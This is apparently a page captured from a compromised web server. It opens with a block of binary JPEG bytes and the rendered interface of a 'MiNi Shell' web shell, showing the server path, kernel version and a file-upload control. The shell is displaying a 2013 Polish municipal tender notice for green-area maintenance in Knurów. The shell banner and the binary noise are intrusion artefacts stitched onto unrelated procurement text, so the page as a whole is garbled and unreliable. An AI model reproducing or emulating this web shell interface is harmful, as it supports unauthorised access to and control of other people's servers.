JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130319/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130319/108938-N-2013.html

<p class="kh_header"><b>Knurów: Usługa kompleksowego utrzymania i konserwacji terenów zielonych z podziałem miasta na 6 rejonów</b><br>
<b>Numer ogłoszenia: 108938 - 2013; data zamieszczenia: 19.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Knurów , ul. dr. Floriana Ogana 5, 44-190 Knurów, woj. śląskie, tel. 32 3392308, faks 32 2351521, 3392292.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.knurow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa kompleksowego utrzymania i konserwacji terenów zielonych z podziałem miasta na 6 rejonów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia obejmuje wykonanie usług kompleksowego utrzymania i konserwacji terenów zielonych z podziałem miasta na 6 rejonów:
1)Rejon nr 1 o pow.11,00 ha (os. WP II), w tym: a)Plac 700-lecia przy ul. Al. Lipowej, b)Zieleń pom. ul. Al. Lipową a MSP nr 7 i 9, c)Zieleń wzdłuż ciągów pieszych: ul. Witosa, ul. Lotników-Sikorskiego, WP I-WP II, d)Przejście łączące ul. Witosa z ciągiem pieszym Witosa, e)Zieleń przy ul. Piłsudczyków i Dyw. Kościuszkowskiej, f)Pas zieleni wzdłuż ul.1 Maja (od Al. Lipowej do Kosmonautów), g)Zieleń pomiędzy ul.1 Maja-Marynarzy, h)Ciąg zieleni wzdłuż ul. 26 Stycznia.
Zakres usług: koszenie trawników - 4-ro krotne pow.- 40.000 m2 ,koszenie trawników - 6-cio krotne pow.- 64.605 m2,pielęgnacja żywopłotu miękkiego 3 razy- 1725 m2
wiosenne wygrabienie trawników z zanieczyszczeń, wywóz i utylizacja odpadów- 54.666 m2, jesienne grabienie liści i wywóz j/w (bez placu 700-lecia)- 70.000 m2, renowacja trawników, likwidacja przedeptów- 300 m2, pielęgnacja drzew piennych (łącznie z kontrolą i wymianą wiązadeł oraz uszkodzonych lub brakujących palików)- 55 szt, pielęgnacja drzew i krzewów iglastych- 26 szt, opryski iglaków (świerków) przeciwko przędziorkowi- 26 szt, opryski iglaków (świerków) przeciwko mszycy świerkowej- 26 szt, odmłodzenie krzewów o średnicy pow. 2m -3 razy- 4 szt, odmłodzenie krzewów o średnicy do 2m -3 razy- 5 szt, pielęgnacja krzewinek- 30 szt 
usuwanie odrostów  przy i z drzew- 12 szt, pielęgnacja drzew i krzewów iglastych po okresie gwarancji- 367 szt, pielęgnacja drzew liściastych po okresie gwarancji- 352 szt, pielęgnacja krzewów  liściastych po okresie gwarancji- 2.301 szt, bieżące utrzymanie terenu- 110.000 m2, zamiatanie nawierzchni  drogi dojazdowej, chodników i miejsc postojowych 1 raz w tygodniu w m-cach V-XI- 5.129 m2, malowanie ławek- 15 szt, naprawa ławek, uzupełnienie siedzisk, oparć i dybli (deski sosnowe)- 20 szt kpl.
2)Rejon nr 2 o pow. 7,20 ha (os. WP I) w tym: a)Zieleń ul. Szpitalna-Batorego, b)Zieleń  wzdłuż ul.Mieszka I (od ul. Kosmonautów do Kazimierza Wielkiego), c)Zieleń wzdłuż ul.Kosmonautów i Szpitalnej do Ułanów, d)Teren pomiędzy ul.Kosmonautów 1-11, e)Zieleń przy ul.Armii  Krajowej, f)Zieleń wzdłuż ul.Szpitalnej (od Ziętka do Intermarche), g)Zieleń od ul.Szpitalnej do Sikorskiego, h)Zieleń wzdłuż ul.Ułanów i MSP Nr 9, i)Teren zielony tzw oczko, j)Teren przy ul.Jedności Narodowej.
Zakres usług: koszenie trawników - 6-cio krotne pow.- 63.366 m2, odmłodzenie  żywopłotu miękkiego 3 razy- 1.410 m2, odmłodzenie krzewów o średnicy do 2m - 3 razy- 63 szt, wiosenne wygrabienie trawników, wywóz i utylizacja odpadów- 63.366 m2, renowacja trawników,likwidacja przedeptów- 350 m2, ;pielęgnacja drzew  (łącznie z kontrolą  i wymianą wiązadeł oraz uszkodzonych lub brakujących palików)- 164 szt, pielęgnacja krzewów iglastych- 90 szt, pielęgnacja krzewów ozdobnych- 464 szt, cięcie odmładzające tawuł- 464 szt, mulczowanie kwietników korą  do 5 cm grubości- 183 m2, opryski iglaków (świerków) przeciwko przędziorkowi- 129 szt, opryski iglaków (świerków) przeciwko mszycy świerkowej- 129 szt, jesienne grabienie liści, wywóz i utylizacja odpadów- 63.366 m2, bieżące utrzymanie czystości terenu łącznie z parkingiem, ciągami pieszymi, chodnikami, placem wypoczynkowym-72.000 m2, odchwaszczenie ścieżki żwirowej- 2 razy- 156 m2, odchwaszczenie ciągów pieszych, ścieżek i placu wypoczynkowego- 8.161 m2, zamiatanie nawierzchni parkingów i chodników opaskowych- 2.651,8 m2, zamiatanie ciągów pieszych,ścieżek i placu wypoczynkowego- 8.161 m2, pielęgnacja kwietnika obsadzonego krzewinkami- 34 m2, pielęgnacja krzewów liściastych wzdłuż hydroforowni- 165 szt, pielęgnacja kwietnika obsadzonego tawułami- 582 szt, pielęgnacja krzewów liściastych (tawuł)- 210 m2, malowanie ławek- 35 szt, mycie ławek z PCV- 16 szt, naprawa ławek, uzupełnianie
siedzisk lub oparć (deski sosnowe)- 30 szt
3)Rejon nr 3 o pow. 7,5 ha (os. 1000-lecia i Redyna) w tym: a)Zieleń  wzdłuż ul.1 Maja, pomiędzy ul.Kazimierza Wielkiego a ul.Wilsona, b)Place zabaw przy ul.Mieszka I i Chrobrego, c)Zieleń wzdłuż ul.K.Wielkiego i S.Batorego, d)Zieleń pomiędzy budynkami ul.Batorego 8-10 i Jagiełły 7, e)Ciąg ul.Mieszka I i Mieszka I boczna (od Kazimierza Wielkiego do Dąbrowskiego), f)Zieleń pomiędzy ul.Batorego i Kosmonautów, g)Zieleń przed budynkiem K.Wielkiego 2 i trawnik wzdłuż parkingu targowiska, h)Zieleń na os.Redyna, i)Zieleń w ul.Szpitalnej i Floriana, j)Teren przy przepompowni ul.Wilsona i Wilsona 15, k)Teren pomiędzy ul.Szpitalną-Wilsona.
Zakres usług: koszenie trawników - 6-cio krotne pow.- 35.860 m2, koszenie trawników 4-ro krotne pow.- 29.591 m2, odmłodzenie żywopłotu miękkiego 3 razy- 6.195 m2, odmłodzenie krzewów o średnicy do 2m - 3 razy- 26 szt, odmłodzenie krzewów o średnicy pow. 2m - 3 razy- 39 szt, wiosenne wygrabienie trawników,krzewów,parkingów i żywopłotów, wywóz i utylizacja odpadów- 48.680 m2, renowacja trawników, likwidacja przedeptów- 350 m2, pielęgnacja drzew liściastych- 62 szt, pielęgnacja drzew i krzewów iglastych- 33 szt, opryski iglaków (świerków) przeciwko przędziorkowi- 24 szt, opryski iglaków (świerków) przeciwko mszycy świerkowej- 24 szt, jesienne grabienie liści, wywóz i utylizacja odpadów- 58.500 m2, usuwanie odrostów przy i z drzew- 39 szt, bieżące utrzymanie  terenu- 70.000 m2
pielęgnacja krzewów liściastych- 105 szt, pielęgnacja krzewów róży pomarszczonej- 110 szt, demontaż ławki- 1 szt, malowanie ławek- 45 szt, naprawa ławek, uzupełnianie siedzisk lub oparć- 30 szt, zamiatanie parkingu 1 raz w tygodniu w okresie V-X- 1.080 m2, zamiatanie chodników,alejek zatok parkingowych 1 raz w tygodniu  w okresie V-XI- 5.155 m2 
4)Rejon nr 4 o pow. 5,9 ha (tereny zielone pomiędzy ul. Ogana i Koziełka) w tym: a)Zieleń  przy ul.Dworcowej 2-10, b)Park przy ul.Ogana, c)Teren przy ul.Floriana, d)Zieleń pomiędzy ul.1 Maja-Klasztorną, e)Zieleń pomiędzy ul. Klasztorną -Koziełka, f)Zieleń przy ul.Wilsona 3-5.
Zakres usług: koszenie trawników 5-cio krotne pow.- 52.870 m2, odmłodzenie żywopłotu miękkiego 3 razy- 1.620 m2, odmłodzenie krzewów o śr. korony do 2 m - 3razy- 188 szt, pielęgnacja drzew piennych- 80 szt, pielęgnacja drzew f.naturalnej- 25 szt, pielęgnacja drzew iglastych- 8 szt, opryski iglaków (świerków) przeciwko przędziorkowi- 8 szt, opryski iglaków (świerkow) przeciwko mszycy świerkowej- 8 szt, usuwanie odrostów przy i z drzew- 20 szt, wiosenne wygrabienie trawników, wywóz i utylizacja odpadów- 52.870 m2, pielęgnacja krzewów  ozdobnych- 287 szt, pielęgnacja rododendronów- 13 szt, jesienne grabienie liści i wywóz j/w- 59.000 m2, bieżące utrzymanie terenu- 59.000 m2, oczyszczenie nawierzchni ciągów pieszych z ziemi, odkrycie obrzeży- 2.170 m2, zamiatanie chodników,ciągów pieszych i schodów- 4.536 m2, odchwaszczanie chodników, ciągów pieszych i schodów- 4.536 m2, malowanie ławek farbą olejną- 56 szt, malowanie ławek lakierobejcą- 6 szt, naprawa ławek, uzupełnianie siedzisk lub oparć i dybli (deski sosnowe)- 30 szt kpl.
5)Rejon nr 5 o pow. 3 ha (tereny zielone pomiędzy ul. Niepodległości, Dworcową i Koziełka) w tym: a)Zieleniec przy ul.Dworcowej (n/p stadionu), b)Zieleniec przy ul.Dworcowej (z pomnikiem Powstańców Śl.), c)Zieleniec i ciąg zieleni przy ul.Niepodległości, d)Zieleniec przy ul.Dworcowej-Kopalnianej, e)Skwer przy ul.Plac Powstańców Śląskich, f)Nieczynny cmentarz  przy ul.Koziełka.
Zakres usług: koszenie trawników - 6-ro krotne pow.- 16.250 m2, odmłodzenie  żywopłotu miękkiego 3 razy- 150 m2, odmłodzenie krzewów o śr. korony do 2m-3 razy- 3 szt, pielęgnacja róż- 222 szt, oprysk róż na mszyce- 222 szt, oprysk róż na choroby grzybowe- 222 szt, jesienne wapnowanie róż- 222 szt, pielęgnacja krzewów liściastych- 4.057 szt, pielęgnacja różaneczników- 61 szt, pielęgnacja drzew i krzewów iglastych- 664 szt, pielęgnacja kwietników obsadzonych bylinami- 90 m2, uzupełnienie do 5cm warstwy kory pod krzewami- 1.724 m2, wiosenne wygrabienie trawników i krzewów z liści, wywóz  i utylizacja odpadów z pow.- 17.024 m2, jesienne grabienie liści  i wywóz j/w- 30.000 m2, pielęgnacja krzewów ozdobnych- 1.974 szt, pielęgnacja liliowca ogrodowego- 491 szt, pielęgnacja drzew piennych- 78 szt, pielęgnacja drzew formy  naturalnej- 2 szt, usuwanie odrostów przy i z drzew- 53 szt, bieżące utrzymanie terenu- 30.000 m2, zamiatanie chodników, alejek,ciągów pieszych, schodów,pochylni, nawierzchni z kostki, miejsc postojowych, wysepek wyłączeniowych- 10.126 m2, odchwaszczanie chodników,alejek, schodów, ciągów 
pieszych , nawierzchni z kostki  2 razy- 7.399 m2, malowanie ławek farbą olejną- 29 szt, malowanie ławek lakierobejcą- 59 szt, naprawa ławek, uzupełnianie siedzisk, oparć i dybli (deski sosnowe) - 45 szt kpl.
6)Rejon Nr 6 o pow. 8,50 ha (os. Krywałd i os. Szczygłowice) w tym: a)Zieleniec w ul.Michalskiego, b)Skwer przy ul.Staszica, c)Teren przy ul.Sztygarskiej, d)Zieleniec przy ul.Lignozy, e)Skwer przy ul.Parkowej, f)Teren pomiędzy ul.Parkową i Kilińskiego, g)Teren przy ul.Żeromskiego, h)Park przy ul.Parkowej.
Zakres usług: koszenie trawników - 3 krotne- 2.748 m2, koszenie trawników - 5-cio krotne pow.- 56.100 m2, koszenie trawników - 6-cio krotne-12.390 m2, odmłodzenie  żywopłotu miękkiego 3 razy- 1.650 m2, odmłodzenie krzewów o śr. korony do 2m-3 razy- 12 szt, odmłodzenie krzewów o śr. korony pow.2m-3 razy- 10 szt, przycięcie krzewów starszych- 20 m2, wiosenne wygrabienie trawników,krzewów, wywóz
i utylizacja odpadów z pow.- 73.000 m2, jesienne grabienie liści  i wywóz j/w- 85.000 m2. pielęgnacja drzew piennych i f.naturalnej- 15 szt, pielęgnacja krzewów (berberysy)- 40 szt, wykaszanie jednorocznych odrostów drzew- 350 m2, zamiatanie nawierzchni z kostki i asfaltobetonowej- 7.212 m2, bieżące utrzymanie terenu- 85.000 m2, malowanie ławek farbą olejną- 38 szt, malowanie ławek lakierobejcą- 31 szt, naprawa ławek,uzupełnianie siedzisk, oparć i dybli (deski sosnowe) - 40 szt kpl.
2.Przedmiot zamówienia został szczegółowo określony w załącznikach do projektów umów dotyczących poszczególnych rejonów
3.Zamawiający dopuszcza możliwość składania ofert częściowych czyli na poszczególne rejony. Wykonawca może złożyć ofertę maksymalnie na 2 wybrane rejony..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>1.Zamawiający zastrzega sobie możliwość udzielenia zamówień uzupełniających na podsta­wie art. 67 ust. 1 pkt. 6 pzp realizatorowi zamówienia zgodnych z przedmiotem zamówie­nia i stanowiących nie więcej niż 20 % jego wartości. 
2.Zamówienie, o którym mowa powyżej może zostać udzielone nie później niż w okresie 3 lat od udzielenia zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.30.00.00-3, 77.31.00.00-6, 77.31.30.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.04.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wykonawca przystępujący do przetargu winien wnieść wadium w wysokości 1.000,00 zł (słownie: tysiąc złotych) dla każdego wybranego rejonu (maksymalnie na 2 wybrane rejony).
2.Wadium winno być wniesione przed upływem terminu składania ofert.
3.Wadium może być wniesione w jednej lub kilku formach, o których mowa w art. 45 ust. 6 pzp.
4.Wadium winno być ważne na cały okres związania ofertą.
5.Wadium wnoszone w pieniądzu wpłaca się przelewem na  rachunek  bankowy Urzędu Miasta Knurów w GETIN NOBLE Bank S.A. konto nr 67 1560 1081 2121 0517 3581 0006.
6.Wadium wniesione w pieniądzu przechowywane jest na rachunku bankowym.
7.Wadium w pozostałych formach należy złożyć w oryginale, w Wydziale Zamówień Publicznych Urzędu Miasta Knurów, ul. dr. Floriana Ogana 5, pok. 218, II piętro, nie później niż do terminu składania ofert wyznaczonego w niniejszej SIWZ, i nie powinno ono stanowić załącznika do oferty - z uwagi na konieczność zwrotu dokumentu.
8.Wadium uważa się za wniesione w terminie:
1)z chwilą uznania rachunku bankowego Zamawiającego przed upływem terminu do składania ofert - w pieniądzu,
2)z chwilą złożenia w Wydziale Zamówień Publicznych Urzędu Miasta Knurów przed upływem terminu składania ofert - w pozostałych formach</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga wykazania w wykazie usług wykonania co najmniej 1 zadania o łącznej wartości brutto min. 60 tys zł, polegającego na pielęgnacji zieleni (koszenie trawników, pielęgnacja żywopłotów, krzewów, itp.), wykonanego w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. W celu potwierdzenia spełnienia warunku wykonawca może wykazać się usługami wykonywanymi (w trakcie realizacji). W takim przypadku zrealizowana wartość usługi, na dzień składania ofert winna być nie mniejsza niż 60 tys zł butto.
Zamawiający oceni spełnienie powyższego warunku na podstawie przedstawionych przez Wykonawcę oświadczeń i dokumentów, na zasadzie spełnia - nie spełnia.
Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu, iż będzie dysponował zasobami (wiedzą i doświadczeniem) niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów (wiedzy i doświadczenia) na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga wykazania się, że wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
Zamawiający oceni spełnienie powyższego warunku na podstawie oświadczenia wykonawcy o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga wskazania w wykazie osób, które będą uczestniczyć w wykonywaniu zamówienia 1 osoby na stanowisko kierownika prac tj. osoby odpowiedzialnej za świadczenie usług, kontrolę jakości i kierowanie pracami legitymującej się minimum średnim wykształceniem ogrodniczym, architektury krajobrazu lub rolniczym
Zamawiający oceni spełnienie powyższego warunku na podstawie przedstawionych przez Wykonawcę oświadczeń i dokumentów, na zasadzie spełnia - nie spełnia.
Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu, iż będzie dysponował osobami zdolnymi do wykonania zamówienia niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych osób zdolnych do wykonania zamówienia na okres korzystania z nich przy wykonywaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga wykazania się, że wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
Zamawiający oceni spełnienie powyższego warunku na podstawie oświadczenia wykonawcy o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
